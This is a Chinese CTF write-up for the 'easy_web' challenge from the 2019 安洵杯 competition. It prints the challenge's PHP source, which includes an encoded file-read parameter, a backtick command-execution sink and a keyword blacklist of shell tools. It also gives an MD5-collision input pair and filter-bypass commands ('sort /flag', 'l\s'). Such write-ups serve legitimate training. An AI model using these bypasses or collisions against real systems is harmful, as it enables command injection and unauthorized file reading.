当前位置:网站首页>[安洵杯 2019]easy_web
[安洵杯 2019]easy_web
2022-08-02 19:20:00 【清风--】
考察知识点:
1.解密的敏感度(或者说工具的强度)
2.md5强比较的累积
3.读取文件的函数累积
解题:
进入页面直接burp抓包:
有一个img=TXpVek5UTTFNbVUzTURabE5qYz0,我们直接放到脚本里跑一下:
脚本很好写的,就贴合自己喜欢的方式写一个就行。解码出来发现是555.png.因为这里url的特性,所以这里应该只是进行了三次编码:
hex->base64->base64
那我们试着读取一下页面源码:
然后贴到img里面
解码一下
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixiï½ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
关于cmd过滤了很多,并且进入的条件还有一个
(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])
简单,把家底炒出来:
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
姿势一:
sort /flag
这个姿势不足的就是不知道flag名字,得猜
姿势二:
l\s
这个方法绕过很好用,也可以知道flag名字
边栏推荐
猜你喜欢
随机推荐
Office2021 安装MathType
Golang sync/atomic 包的原子操作说明
Caldera(一)配置完成的虚拟机镜像及admin身份简单使用
快速掌握jmeter(一)——实现自动登录与动态变量
MySQL安装配置教程(超级详细)
ssh configuration
Geoserver+mysql+openlayers
斯堪尼亚SCANIA OTL标签介绍
idea 配置resin
光源控制器接口定义说明
What is the use of IT assets management software
SQL-UDT是什么功能?
Kali命令ifconfig报错command not found
Gradle系列——Gradle的build.gradle文件详情,项目发布(基于Gradle文档7.5)day3-3
【C语言刷题】双指针原地修改数组(力扣原题分析)
健康报告-设计与实现
AI科学家:自动发现物理系统的隐藏状态变量
移动跨端技术方案分析对比
2022-07-26
EasyCVR平台通过国标GB28181接入柯达NVR显示注册失败,该如何解决?